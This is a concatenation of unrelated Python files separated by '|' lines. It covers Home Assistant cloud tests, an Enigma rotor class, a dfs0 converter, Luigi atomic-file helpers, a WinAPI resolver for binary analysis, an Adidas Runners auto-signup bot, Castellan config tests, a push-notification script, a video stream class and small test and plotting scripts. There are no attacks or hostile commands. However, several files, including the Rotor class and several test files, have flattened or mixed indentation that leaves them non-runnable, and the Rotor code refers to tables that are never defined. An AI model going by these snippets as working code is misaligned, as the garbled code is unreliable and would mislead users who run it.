"""Test Google config exposing entity method uses latest config."""
cloud_client = hass.data[DOMAIN].client
state = State("light.kitchen", "on")
gconf = await cloud_client.get_google_config()
assert gconf.should_expose(state)
await cloud_client.prefs.async_update_google_entity_config(
entity_id="light.kitchen", should_expose=False
)
assert not gconf.should_expose(state)
async def test_google_config_should_2fa(hass, mock_cloud_setup, mock_cloud_login):
"""Test Google config disabling 2FA method uses latest config."""
cloud_client = hass.data[DOMAIN].client
gconf = await cloud_client.get_google_config()
state = State("light.kitchen", "on")
assert gconf.should_2fa(state)
await cloud_client.prefs.async_update_google_entity_config(
entity_id="light.kitchen", disable_2fa=True
)
assert not gconf.should_2fa(state)
async def test_set_username(hass):
"""Test we set username during login."""
prefs = MagicMock(
alexa_enabled=False,
google_enabled=False,
async_set_username=MagicMock(return_value=mock_coro()),
)
client = CloudClient(hass, prefs, None, {}, {})
client.cloud = MagicMock(is_logged_in=True, username="mock-username")
await client.logged_in()
assert len(prefs.async_set_username.mock_calls) == 1
assert prefs.async_set_username.mock_calls[0][1][0] == "mock-username"
|
"""
Rotor.py
Author: Colin Page
colin.w.page1@gmail.com
This file holds the Rotor class which defines the functionality
of a single Enigma Rotor
"""
class Rotor():
def __init__(self, rotor_num, start_pos):
self.rotor_num = rotor_num
self.pos = start_pos
if self.rotor_num == 1:
self.letter_map = MAP_ONE
self.back_map = BACK_ONE
elif self.rotor_num == 2:
self.letter_map = MAP_TWO
self.back_map = BACK_TWO
elif self.rotor_num == 3:
self.letter_map = MAP_THREE
self.back_map = BACK_THREE
elif self.rotor_num == 4:
self.letter_map = MAP_FOUR
self.back_map = BACK_FOUR
else:
self.letter_map = MAP_FIVE
self.back_map = BACK_FIVE
    def run_letter(self, letter, forward_pass):
if forward_pass:
map_pos = (letter + self.pos) % 26
return self.letter_map[map_pos]
else:
output = self.back_map[letter] - self.pos
if output < 0:
output += 26
return output % 26
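# Illustrative usage sketch (assuming the wiring tables above are defined):
#     rotor = Rotor(rotor_num=1, start_pos=0)
#     out = rotor.run_letter(0, forward_pass=True)      # letter 0 ('A') through rotor I
#     back = rotor.run_letter(out, forward_pass=False)  # inverse pass through the same rotor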
|
from datetime import datetime, timedelta
from mikecore.DfsFile import *
from mikecore.DfsFileFactory import *
def Dfs0ToAscii(dfs0FileName, txtFileName):
    '''Writes dfs0 data to text file in similar format as other MIKE Zero tools '''
    dfs = DfsFileFactory.DfsGenericOpen(dfs0FileName)
    txt = open(txtFileName, "w")
    txt.write(" ")
    txt.write(dfs.FileInfo.FileTitle)
    txt.write("\n")
    txt.write(" Time")
    for item in dfs.ItemInfo:
        txt.write(' {}'.format(item.Name))
    txt.write("\n")
    txt.write(" Item")
    for item in dfs.ItemInfo:
        txt.write(' {:11} {:11} {:11}'.format(item.Quantity.Item.value, item.Quantity.Unit.value, item.ValueType.name))
    txt.write("\n")
    txt.write(" Item")
    for item in dfs.ItemInfo:
        txt.write(' {:11} {:11} {:11}'.format('"'+item.Quantity.ItemDescription+'"', '"'+item.Quantity.UnitDescription+'"', item.ValueType.name))
    txt.write("\n")
    isCalendarTime = False
    if (dfs.FileInfo.TimeAxis.TimeAxisType == TimeAxisType.CalendarEquidistant or
            dfs.FileInfo.TimeAxis.TimeAxisType == TimeAxisType.CalendarNonEquidistant):
        isCalendarTime = True
        startDateTime = dfs.FileInfo.TimeAxis.StartDateTime
    for i in range(dfs.FileInfo.TimeAxis.NumberOfTimeSteps):
        for j in range(len(dfs.ItemInfo)):
            itemData = dfs.ReadItemTimeStepNext()
            if (j == 0):
                if (isCalendarTime):
                    # TODO: Time unit is not always seconds
                    itemTime = startDateTime + timedelta(seconds=itemData.Time)
                    # Depending on the format to write to the file:
                    #txt.write(itemTime.strftime("%Y-%m-%d %H:%M:%S"))  # Seconds accuracy
                    txt.write(itemTime.strftime("%Y-%m-%d %H:%M:%S.%f")[:-3])  # Milli-seconds accuracy
                    #txt.write(itemTime.strftime("%Y-%m-%d %H:%M:%S.%f"))  # Micro-seconds accuracy
                else:
                    txt.write('{:19.6E}'.format(itemData.Time))
            txt.write(' {:18.11E}'.format(itemData.Data[0]))
        txt.write("\n")
    dfs.Close()
    txt.close()
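# Example call (file names are hypothetical):
#     Dfs0ToAscii("data.dfs0", "data.txt")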
|
# -*- coding: utf-8 -*-
""" This module supplements Luigi's atomic writing within its Target classes.
The subclassed method preserves the suffix of the output target in the temporary file.
"""
import io
import os
import random
from contextlib import contextmanager
import luigi
from luigi.local_target import LocalTarget, atomic_file
from luigi.format import FileWrapper, get_default_format
class suffix_preserving_atomic_file(atomic_file):
    """ This class provides the method to create the name of a temporary path, preserving the extension
    """
    def generate_tmp_path(self, path):
        """Override of atomic_file.generate_tmp_path that keeps the target's suffix """
        dirname, fname = os.path.split(path)
        try:
            basename, ext = fname.split('.', 1)
            ext = '.' + ext
        except ValueError:
            # no extension in the file name
            basename, ext = fname, ''
        self.__gen_tmppath = os.path.join(
            dirname,
            '%s-luigi-tmp-%09d%s' % (basename, random.randrange(0, 10**10), ext),
        )
        return self.__gen_tmppath
class BaseAtomicProviderLocalTarget(LocalTarget):
"""This provides the base atomic provider class with 2 methods:
- open()
- temporary_path()
"""
# Allow some composability of atomic handling
atomic_provider = atomic_file
    def __init__(self, path=None, format=None, is_tmp=False):
        if format is None:
            format = get_default_format()
        super().__init__(path, format=format, is_tmp=is_tmp)
    def open(self, mode='r'):
        # Same flow as LocalTarget.open(), but writes go through atomic_provider
        # instead of the hardcoded atomic_file, so the temp file keeps its suffix
        rwmode = mode.replace('b', '').replace('t', '')
        if rwmode == 'w':
            self.makedirs()
            return self.format.pipe_writer(self.atomic_provider(self.path))
        elif rwmode == 'r':
            fileobj = FileWrapper(io.BufferedReader(io.FileIO(self.path, mode)))
            return self.format.pipe_reader(fileobj)
        else:
            raise Exception("mode must be 'r' or 'w' (got: %s)" % mode)
@contextmanager
def temporary_path(self):
lpath = self.path
self.makedirs()
with self.atomic_provider(lpath) as af:
yield af.tmp_path
class SuffixPreservingLocalTarget(BaseAtomicProviderLocalTarget):
"""This class returns the temporary path
"""
# Set atomic_provider to the suffix preserving method
atomic_provider = suffix_preserving_atomic_file
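# Illustrative usage sketch (path and writer are hypothetical):
#     target = SuffixPreservingLocalTarget('data/report.csv.gz')
#     with target.temporary_path() as tmp:
#         # tmp looks like 'data/report-luigi-tmp-012345678.csv.gz', so tools
#         # that sniff the file type from the suffix keep working
#         write_csv(tmp)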
|
#!/usr/bin/python
import os
import json
import logging
import lief
lief.logging.disable()
from .AbstractLabelProvider import AbstractLabelProvider
from smda.common.labelprovider.OrdinalHelper import OrdinalHelper
LOGGER = logging.getLogger(__name__)
class WinApiResolver(AbstractLabelProvider):
""" Minimal WinAPI reference resolver, extracted from ApiScout """
def __init__(self, config):
self._config = config
self._has_64bit = False
self._api_map = {
"lief": {}
}
self._os_name = None
self._is_buffer = False
for os_name, db_filepath in self._config.API_COLLECTION_FILES.items():
self._loadDbFile(os_name, db_filepath)
self._os_name = os_name
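            # _os_name defaults to the last collection loaded; setOsName() can override it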
def update(self, binary_info):
self._is_buffer = binary_info.is_buffer
if not self._is_buffer:
#setup import table info from LIEF
lief_binary = lief.parse(bytearray(binary_info.raw_data))
if not isinstance(lief_binary, lief.PE.Binary):
return
for imported_library in lief_binary.imports:
for func in imported_library.entries:
if func.name:
self._api_map["lief"][func.iat_address + binary_info.base_addr] = (imported_library.name.lower(), func.name)
elif func.is_ordinal:
resolved_ordinal = OrdinalHelper.resolveOrdinal(imported_library.name.lower(), func.ordinal)
ordinal_name = resolved_ordinal if resolved_ordinal else "#%s" % func.ordinal
self._api_map["lief"][func.iat_address + binary_info.base_addr] = (imported_library.name.lower(), ordinal_name)
def setOsName(self, os_name):
self._os_name = os_name
def _loadDbFile(self, os_name, db_filepath):
api_db = {}
if os.path.isfile(db_filepath):
with open(db_filepath, "r") as f_json:
api_db = json.loads(f_json.read())
else:
LOGGER.error("Can't find ApiScout collection file: \"%s\" -- continuing without ApiResolver.", db_filepath)
return
num_apis_loaded = 0
api_map = {}
for dll_entry in api_db["dlls"]:
LOGGER.debug(" building address map for: %s", dll_entry)
for export in api_db["dlls"][dll_entry]["exports"]:
num_apis_loaded += 1
api_name = "%s" % (export["name"])
if api_name == "None":
api_name = "None<{}>".format(export["ordinal"])
dll_name = "_".join(dll_entry.split("_")[2:])
bitness = api_db["dlls"][dll_entry]["bitness"]
self._has_64bit |= bitness == 64
base_address = api_db["dlls"][dll_entry]["base_address"]
virtual_address = base_address + export["address"]
api_map[virtual_address] = (dll_name, api_name)
LOGGER.debug("loaded %d exports from %d DLLs (%s).", num_apis_loaded, len(api_db["dlls"]), api_db["os_name"])
self._api_map[os_name] = api_map
def isApiProvider(self):
"""Returns whether the get_api(..) function of the AbstractLabelProvider is functional"""
return True
def getApi(self, to_addr, absolute_addr):
"""If the LabelProvider has any information about a used API for the given address, return (dll, api), else return None"""
# if we work on a dump, use ApiScout method:
if self._is_buffer:
if self._os_name and self._os_name in self._api_map:
return self._api_map[self._os_name].get(absolute_addr, None)
# otherwise take import table info from LIEF
else:
return self._api_map["lief"].get(to_addr, None)
return None
|
"""
RUNBASE-IMP
HTML scraping bot for monitoring Adidas Runners events
Author: Francesco Ramoni
francesco[dot]ramoni@email.it
https://github.com/framoni/
"""
import json
from lxml import html
from selenium import webdriver
import time
from twilio.rest import Client
#-------------------------------------------------------------------------------
# PARAMETERS
# url to be scraped
ar_url = 'https://www.adidas.it/adidasrunners/community/milano'
# request header
user_agent = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'
# message
message = 'Le iscrizioni agli eventi Adidas Runners di questa settimana sono state effettuate. runbase-imp'
# twilio data
with open("runbase-imp-param.json") as j:
for line in j:
td = json.loads(line)
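# The parameter file is expected to provide the credentials used below,
# e.g. (hypothetical values):
#     {"email": "...", "pass": "...", "twilio_client": "ACxxxx", "twilio_token": "...",
#      "phone_to": "+39xxxxxxxxxx", "phone_from": "+1xxxxxxxxxx"}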
# set webdriver options
options = webdriver.ChromeOptions()
options.add_argument('headless')
options.add_argument(f'user-agent={user_agent}')
#-------------------------------------------------------------------------------
# FUNCTIONS
# function to scrape event url
def scrape_event_url(event_name):
browser.get(ar_url)
event_url = browser.find_element_by_xpath('//a[contains(div//div//h3, "{}") and contains(., "SENZA spogliatoio")]'.format(event_name)).get_attribute("href")
return event_url
# function to sign up to an event
def event_signup(event_name, do_login):
print("Event: {}".format(event_name))
event_url = scrape_event_url(event_name)
# go to event page
browser.get(event_url)
# login
if do_login:
login()
# wait 10 seconds to bypass a UI visual bug (?) showing a second login form
time.sleep(10)
# sign up to the event
button_signup = browser.find_element_by_xpath('//*[@title="Iscriviti"]')
browser.execute_script("arguments[0].click();", button_signup)
# function to login to the portal
def login():
# click on login button
button_login = browser.find_element_by_xpath('//*[@title="Accedi"]')
browser.execute_script("arguments[0].click();", button_login)
# send username, password and confirm
browser.find_element_by_id('email').send_keys(td['email'])
browser.find_element_by_id('password').send_keys(td['pass'])
button_send = browser.find_element_by_xpath('//*[@title="Invia"]')
browser.execute_script("arguments[0].click();", button_send)
return
#-------------------------------------------------------------------------------
# SCRAPING
# create a new driver
browser = webdriver.Chrome(options=options)
browser.implicitly_wait(60)
print("Signing up to the Adidas Runners events... ")
# sign up to events of interest
event_signup('MONDAY HEROES', True)
event_signup('ROAD TO YOUR BEST', False)
# close the driver
browser.quit()
# send a SMS to notify
print("Notifying via SMS... ")
client = Client(td['twilio_client'], td['twilio_token'])
client.messages.create(to=td['phone_to'], from_=td['phone_from'], body=message)
print("Job done. ")
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Functional test cases for the Castellan Oslo Config Driver.
Note: This requires a locally running instance of Vault.
"""
import tempfile
from oslo_config import cfg
from oslo_config import fixture
from oslotest import base
from castellan import _config_driver
from castellan.common.objects import opaque_data
from castellan.tests.unit.key_manager import fake
class CastellanSourceTestCase(base.BaseTestCase):
def setUp(self):
super(CastellanSourceTestCase, self).setUp()
self.driver = _config_driver.CastellanConfigurationSourceDriver()
self.conf = cfg.ConfigOpts()
self.conf_fixture = self.useFixture(fixture.Config(self.conf))
def test_incomplete_driver(self):
# The group exists, but does not specify the
# required options for this driver.
self.conf_fixture.load_raw_values(
group='incomplete_driver',
driver='castellan',
)
source = self.conf._open_source_from_opt_group('incomplete_driver')
self.assertIsNone(source)
self.assertEqual(self.conf.incomplete_driver.driver, 'castellan')
def test_complete_driver(self):
self.conf_fixture.load_raw_values(
group='castellan_source',
driver='castellan',
config_file='config.conf',
mapping_file='mapping.conf',
)
with base.mock.patch.object(
_config_driver,
'CastellanConfigurationSource') as source_class:
self.driver.open_source_from_opt_group(
self.conf, 'castellan_source')
source_class.assert_called_once_with(
'castellan_source',
self.conf.castellan_source.config_file,
self.conf.castellan_source.mapping_file)
def test_fetch_secret(self):
# fake KeyManager populated with secret
km = fake.fake_api()
secret_id = km.store("fake_context",
opaque_data.OpaqueData(b"super_secret!"))
# driver config
config = "[key_manager]\nbackend=vault"
mapping = "[DEFAULT]\nmy_secret=" + secret_id
# creating temp files
with tempfile.NamedTemporaryFile() as config_file:
config_file.write(config.encode("utf-8"))
config_file.flush()
with tempfile.NamedTemporaryFile() as mapping_file:
mapping_file.write(mapping.encode("utf-8"))
mapping_file.flush()
self.conf_fixture.load_raw_values(
group='castellan_source',
driver='castellan',
config_file=config_file.name,
mapping_file=mapping_file.name,
)
source = self.driver.open_source_from_opt_group(
self.conf,
'castellan_source')
# replacing key_manager with fake one
source._mngr = km
# testing if the source is able to retrieve
# the secret value stored in the key_manager
# using the secret_id from the mapping file
self.assertEqual("super_secret!",
source.get("DEFAULT",
"my_secret",
cfg.StrOpt(""))[0])
|
#!/usr/bin/python
##
# Send a push message via the Google Cloud Messaging.
#
# Dependencies:
# - python-gcm. Install it with pip: pip install python-gcm.
#
# Params:
# 1.: GCM API key.
# 2.: Target device registration id.
# 3. - : The message's key-value pairs, separated with ':'.
#
# Examples:
# $ send-push.py api_key reg_id title:mytitle detail:mydetail
##
# process args
import sys
api_key = sys.argv[1]
reg_id = sys.argv[2]
data = {}
try:
argi = 3
while True:
splittedArg = sys.argv[argi].split(':')
data[splittedArg[0]] = splittedArg[1]
argi += 1
except IndexError:
    print('Args processed. The message:')
import pprint
pprint.pprint(data, width=1)
# send the request
from gcm import GCM
gcm = GCM(api_key)
response = gcm.json_request(registration_ids=[reg_id], data=data, priority='high')
# print successfully handled registration_ids
if response and 'success' in response:
for reg_id, success_id in response['success'].items():
        print('Successfully sent notification for reg_id {0}'.format(reg_id))
else:
    print('Failed to send any notification')
|
"""
Copyright (c) 2019 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging as log
import time
from multiprocessing import Process, Value, Array
import cv2
import numpy as np
class VideoStream:
""" This class returns constant framerate frames from the input stream. """
def __init__(self, input_source, trg_fps, batch_size):
"""Constructor"""
try:
self._input_source = int(input_source)
except ValueError:
self._input_source = input_source
self._trg_fps = trg_fps
assert self._trg_fps > 0
self._batch_size = batch_size
assert self._batch_size > 0
cap = cv2.VideoCapture(self._input_source)
assert cap.isOpened(), "Can't open " + str(self._input_source)
self.source_fps = cap.get(cv2.CAP_PROP_FPS)
source_height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
source_width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
cap.release()
self._image_shape = [source_height, source_width, 3]
self._batch_shape = [batch_size] + self._image_shape
self._image_buffer_size = int(np.prod(self._image_shape))
self._batch_buffer_size = int(np.prod(self._batch_shape))
self._source_finished = Value('i', False, lock=False)
self._raw_frame = Array('B', self._image_buffer_size, lock=True)
self._slow_frame = Array('B', self._image_buffer_size, lock=True)
self._slow_batch = Array('B', self._batch_buffer_size, lock=True)
self._frame_generator_process = None
self._producer_process = None
def fps(self):
"""Returns the input source fps"""
return self.source_fps
def get_live_frame(self):
"""Returns last live frame from the input stream"""
if self._source_finished.value:
return None
with self._raw_frame.get_lock():
buffer = np.frombuffer(self._raw_frame.get_obj(), dtype=np.uint8)
frame = np.copy(buffer.reshape(self._image_shape))
return frame
def get_batch(self):
"""Returns last batch of frames with constant framerate from the input stream"""
if self._source_finished.value:
return None
with self._slow_batch.get_lock():
buffer = np.frombuffer(self._slow_batch.get_obj(), dtype=np.uint8)
batch = np.copy(buffer.reshape(self._batch_shape))
return batch
def start(self):
"""Starts internal threads"""
self._frame_generator_process = \
Process(target=self._frame_generator,
args=(self._input_source, self._raw_frame, self._image_shape,
self._source_finished))
self._frame_generator_process.daemon = True
self._frame_generator_process.start()
self._producer_process = \
Process(target=self._producer,
args=(self._raw_frame, self._slow_frame, self._slow_batch,
self._trg_fps, self._batch_size, self._image_shape,
self._source_finished))
self._producer_process.daemon = True
self._producer_process.start()
def release(self):
"""Release internal threads"""
if self._frame_generator_process is not None:
self._frame_generator_process.terminate()
self._frame_generator_process.join()
if self._producer_process is not None:
self._producer_process.terminate()
self._producer_process.join()
@staticmethod
def _frame_generator(input_source, out_frame, frame_shape, finish_flag):
"""Produces live frames from the input stream"""
cap = cv2.VideoCapture(input_source)
cap.set(cv2.CAP_PROP_BUFFERSIZE, 1)
source_fps = cap.get(cv2.CAP_PROP_FPS)
if source_fps > 0:
trg_time_step = 1.0 / source_fps
else:
            log.warning('Got a non-positive value as FPS of the input. Interpreting it as 30 FPS')
trg_time_step = 1.0 / 30.0
while True:
start_time = time.perf_counter()
_, frame = cap.read()
if frame is None:
break
with out_frame.get_lock():
buffer = np.frombuffer(out_frame.get_obj(), dtype=np.uint8)
np.copyto(buffer.reshape(frame_shape), frame)
end_time = time.perf_counter()
elapsed_time = end_time - start_time
rest_time = trg_time_step - elapsed_time
if rest_time > 0.0:
time.sleep(rest_time)
finish_flag.value = True
cap.release()
@staticmethod
def _producer(input_frame, out_frame, out_batch, trg_fps, batch_size, image_shape, finish_flag):
"""Produces frames and batch of frames with constant framerate
from the internal stream of frames"""
trg_time_step = 1.0 / float(trg_fps)
batch_shape = [batch_size] + image_shape
frame_buffer = []
while not finish_flag.value:
start_time = time.perf_counter()
with input_frame.get_lock():
in_frame_buffer = np.frombuffer(input_frame.get_obj(), dtype=np.uint8)
frame = np.copy(in_frame_buffer.reshape(image_shape))
with out_frame.get_lock():
out_frame_buffer = np.frombuffer(out_frame.get_obj(), dtype=np.uint8)
np.copyto(out_frame_buffer.reshape(image_shape), frame)
frame_buffer.append(frame)
if len(frame_buffer) > batch_size:
frame_buffer = frame_buffer[-batch_size:]
if len(frame_buffer) == batch_size:
with out_batch.get_lock():
out_batch_buffer = np.frombuffer(out_batch.get_obj(), dtype=np.uint8)
np.copyto(out_batch_buffer.reshape(batch_shape), frame_buffer)
end_time = time.perf_counter()
elapsed_time = end_time - start_time
rest_time = trg_time_step - elapsed_time
if rest_time > 0.0:
time.sleep(rest_time)
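# Illustrative usage sketch (source and rates are hypothetical):
#     stream = VideoStream(0, trg_fps=30, batch_size=16)
#     stream.start()
#     frame = stream.get_live_frame()  # latest raw frame, or None once the source ends
#     batch = stream.get_batch()       # constant-framerate batch, or None once the source ends
#     stream.release()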
|
from datarefinery.TupleOperations import keep
def test_empty():
inp = None
op = keep(["field1"])
(res, err) = op(inp)
assert res is None
assert err == {'field1': 'field1 not found'}
def test_some_value():
inp = {"field1": True}
op = keep(["field1"])
(res, err) = op(inp)
assert res == {"field1": True}
assert err is None
def test_field_not_found():
inp = {"field1": True}
op = keep(["missing"])
(res, err) = op(inp)
assert res is None
assert err == {'missing': 'missing not found'}
def test_multiple_fields():
inp = {"field1": True, "field2": True, "field3": True, "field4": True}
op = keep(["field1", "field2", "field3"])
(res, err) = op(inp)
assert err is None
assert res == {"field1": True, "field2": True, "field3": True}
|
from baseq.setting import r_script_dir
import os, sys
from baseq.mgt import get_config, run_cmd
def plot_genome(bincount, cbs_path, path_out):
"""Plot the genome
"""
script = os.path.join(r_script_dir, "Genome_Plot.R")
#dynamic_bin = get_config("CNV_ref_"+genome, "dynamic_bin")
cmd = "Rscript {} {} {} {}".format(script, bincount, cbs_path, path_out)
    try:
        run_cmd("Plot Genome", cmd)
        # build the json...
    except Exception:
        sys.exit("[error] Failed to run the Genome Plot Rscript ...")
|
def main():
    n = int(input())
    arr = [int(i) for i in input().split()]
    # exchange sort: compare each later element with arr[i] and swap when out of order
    for i in range(n - 1):
        for j in range(i + 1, n):
            if arr[i] > arr[j]:
                arr[i], arr[j] = arr[j], arr[i]
    print(" ".join(str(i) for i in arr))
try:
    while True:
        main()
except (EOFError, ValueError):
    # stop once the input is exhausted (or a trailing blank line is read)
    pass
# for i in range(x):
# d=main()
# out.append("Case {}: {}".format(i+1,d))
# for i in out:
# print(i)
|
import h2o
import numpy as np
h2o.init()  # connect to (or start) a local H2O cluster
df = h2o.H2OFrame.from_python(np.random.randn(100, 4).tolist(), column_names=list('ABCD'))
# View top 10 rows of the H2OFrame
df.head()
# A B C D
# --------- ---------- ---------- ---------
# -0.613035 -0.425327 -1.92774 -2.1201
# -1.26552 -0.241526 -0.0445104 1.90628
# 0.763851 0.0391609 -0.500049 0.355561
# -1.24842 0.912686 -0.61146 1.94607
# 2.1058 -1.83995 0.453875 -1.69911
# 1.7635 0.573736 -0.309663 -1.51131
# -0.781973 0.051883 -0.403075 0.569406
# 1.40085 1.91999 0.514212 -1.47146
# -0.746025 -0.632182 1.27455 -1.35006
# -1.12065 0.374212 0.232229 -0.602646
#
# [10 rows x 4 columns]
# View bottom 5 rows of the H2OFrame
df.tail(5)
# A B C D
# --------- ---------- --------- ---------
# 1.00098 -1.43183 -0.322068 0.374401
# 1.16553 -1.23383 -1.71742 1.01035
# -1.62351 -1.13907 2.1242 -0.275453
# -0.479005 -0.0048988 0.224583 0.219037
# -0.74103 1.13485 0.732951 1.70306
#
# [5 rows x 4 columns]
|
# -*- coding: utf-8 -*-
from models.group import Group
def test_FullForm(app, db, json_groups, check_ui):
group = json_groups
old_groups = db.get_group_list()
app.groups.create(group)
# assert len(old_groups) + 1 == app.groups.count_groups()
new_groups = db.get_group_list()
old_groups.append(group)
assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)
if check_ui:
assert sorted(new_groups, key=Group.id_or_max) == sorted(app.groups.get_group_list(),
key=Group.id_or_max)
# def test_EmptyForm(app):
# old_groups = app.groups.get_group_list()
# group = Group(name="", header="", footer="")
# app.groups.create(group)
# new_groups = app.groups.get_group_list()
# assert len(old_groups) + 1 == len(new_groups)
# old_groups.append(group)
# assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)
# testdata = [Group(name="", header="", footer="")] + [
# Group(name=random_string("name", 10), header=random_string("header", 20), footer=random_string("footer", 20))
# for i in range(5)
# ]
# testdata = [
# Group(name=name, header=header, footer=footer)
# for name in ["", random_string("name", 10)]
# for header in ["", random_string("header", 20)]
# for footer in ["", random_string("footer", 20)]
# ]
|
import re
from model.contact import Contact
from test.test_email import merge_emails_like_on_home_page
def test_phones_on_home_page(app):
contact_from_home_page = app.contact.get_contact_list()[0]
contact_from_edit_page = app.contact.get_contact_info_from_edit_page(0)
assert contact_from_home_page.all_phones_from_home_page == merge_phones_like_on_home_page(contact_from_edit_page)
def test_contact_data_on_home_page(app):
contact_from_home_page = app.contact.get_contact_list()[0]
contact_from_edit_page = app.contact.get_contact_info_from_edit_page(0)
assert contact_from_home_page.all_phones_from_home_page == merge_phones_like_on_home_page(contact_from_edit_page)
assert contact_from_home_page.all_emails_from_home_page == merge_emails_like_on_home_page(contact_from_edit_page)
def test_contact_data_on_db(app, db):
contacts_from_ui = sorted(app.contact.get_contact_list(), key=Contact.id_or_max)
contacts_from_db = sorted(db.get_contact_list(), key=Contact.id_or_max)
for i, contacts in enumerate(contacts_from_ui):
contact_from_db = contacts_from_db[i]
assert contacts.firstname == contact_from_db.firstname
assert contacts.lastname == contact_from_db.lastname
assert contacts.id == contact_from_db.id
#emails_from_ui = contacts.all_emails_from_home_page.splitlines()
# emails_from_db = []
# if contact_from_db.email:
# emails_from_db.append(contact_from_db.email)
# if contact_from_db.email2:
# emails_from_db.append(contact_from_db.email2)
# if contact_from_db.email3:
# emails_from_db.append(contact_from_db.email3)
#assert emails_from_db == emails_from_ui
#assert contacts.address == contact_from_db.address
assert contacts.all_phones_from_home_page == merge_phones_like_on_home_page(contact_from_db)
assert contacts.all_emails_from_home_page == merge_emails_like_on_home_page(contact_from_db)
# def test_phones_on_contact_view_page(app):
# contact_from_view_page = app.contact.get_contact_from_view_page(0)
# contact_from_edit_page = app.contact.get_contact_info_from_edit_page(0)
# assert contact_from_view_page.homephone == contact_from_edit_page.homephone
# assert contact_from_view_page.mobilephone == contact_from_edit_page.mobilephone
# assert contact_from_view_page.workphone == contact_from_edit_page.workphone
# assert contact_from_view_page.secondaryphone == contact_from_edit_page.secondaryphone
def clear(s):
return re.sub("[() -]", "", s)
def merge_phones_like_on_home_page(contact):
return "\n".join(filter(lambda x: x != "",
map(lambda x: clear(x),
filter(lambda x: x is not None,
[contact.homephone, contact.mobilephone, contact.workphone, contact.secondaryphone]))))
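# e.g. a contact with homephone "123-456" and workphone "(789) 000" merges to "123456\n789000"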
|
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import numpy as np
def read_log(filename):
with open(filename, 'r') as file_h:
content = file_h.readlines()
preprocessors = []
regressors = []
rescalers = []
for line in content:
if 'preprocessor:__choice__' in line:
preprocessors.append(line.split('Value: ')[1].replace("'", '').strip())
elif 'regressor:__choice__' in line:
regressors.append(line.split('Value: ')[1].replace("'", '').strip())
elif 'rescaling:__choice__' in line:
rescalers.append(line.split('Value: ')[1].replace("'", '').strip())
    # constructing the DataFrame doubles as a sanity check: it raises if the
    # three lists ended up with different lengths
    df = pd.DataFrame({'preprocessor': preprocessors, 'regressor': regressors, 'rescaling': rescalers})
return df
if __name__ == '__main__':
df = read_log('automl.log')
# df = read_log('automl_no_pp.log')
# df = pd.read_pickle('automl.p')
# df = df.drop_duplicates()
pre_x = 0
reg_x = 20
res_x = 10
f, ax = plt.subplots(1)
bbox = {'boxstyle': 'round', 'facecolor': 'wheat'}
for idx, row in df.iterrows():
y_pre = np.where(df.preprocessor.unique() == row.preprocessor)[0]
y_res = np.where(df.rescaling.unique() == row.rescaling)[0]
y_reg = np.where(df.regressor.unique() == row.regressor)[0]
ax.plot([pre_x, res_x, reg_x], [y_pre, y_res, y_reg], 'k-', alpha=.3)
for idx, preprocessor in enumerate(df.preprocessor.unique()):
ax.plot(pre_x, idx, 'ko', markerfacecolor='w', markeredgecolor='k', markeredgewidth=1)
ax.text(pre_x, idx, preprocessor, ha='right', va='center', bbox=bbox)
for idx, rescaler in enumerate(df.rescaling.unique()):
ax.plot(res_x, idx, 'ko', markerfacecolor='w', markeredgecolor='k', markeredgewidth=1)
ax.text(res_x, idx, rescaler, ha='center', va='center', bbox=bbox)
for idx, regressor in enumerate(df.regressor.unique()):
ax.plot(reg_x, idx, 'ko', markerfacecolor='w', markeredgecolor='k', markeredgewidth=1)
ax.text(reg_x, idx, regressor, ha='left', va='center', bbox=bbox)
ax.text(reg_x, len(df.regressor.unique()), 'Regressor', ha='left', va='center', fontweight='bold')
ax.text(res_x, len(df.rescaling.unique()), 'Rescaling', ha='center', va='center', fontweight='bold')
ax.text(pre_x, len(df.preprocessor.unique()), 'Preprocessor', ha='right', va='center', fontweight='bold')
ax.set_xlim(-20, 30)
ax.axis('off')
plt.show()
|
#!/usr/bin/env python
# Author: Derrick H. Karimi
# Copyright 2014
# Unclassified
import re
import botlog
from bbot.Utils import *
from bbot.StatsParser import StatsParser
S = SPACE_REGEX
N = NUM_REGEX
class EndTurnParser(StatsParser):
def __init__(self):
StatsParser.__init__(self)
self.buymenu = True
def get_patterns(self):
return {
'Your dominion gained ' + NUM_REGEX + ' million people\.': 1610,
'Your dominion lost ' + NUM_REGEX + ' million people\.': 1620,
NUM_REGEX + ' units of food spoiled\.': 1630,
NUM_REGEX + ' units of food has been eaten by a hungry user\.': 1640
}
def on_match(self, app, line, which):
realm = app.data.realm
army = realm.army
regions = realm.regions
if which == 1610:
app.data.realm.population.growth = self.get_num(0)
elif which == 1620:
app.data.realm.population.growth = -self.get_num(0)
elif which == 1630:
app.data.realm.food.spoilage = self.get_num(0)
elif which == 1640:
app.data.realm.food.randomly_eaten = self.get_num(0)
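# e.g. the line 'Your dominion gained 5 million people.' matches pattern 1610,
# so on_match() stores 5 in app.data.realm.population.growth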
|
import qdarkstyle
import sys
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from Voicelab.VoicelabWizard.InputTab import InputTab
from Voicelab.VoicelabWizard.OutputTab import OutputTab
from Voicelab.VoicelabWizard.SettingsTab import SettingsTab
#from Voicelab.VoicelabWizard.ExperimentalTab import ExperimentalTab
from Voicelab.VoicelabWizard.VoicelabController import VoicelabController
#from Voicelab.VoicelabWizard.ManipulationWindow import ManipulationWindow
from Voicelab.default_settings import available_functions, default_functions
import logging
sys.setrecursionlimit(10000)
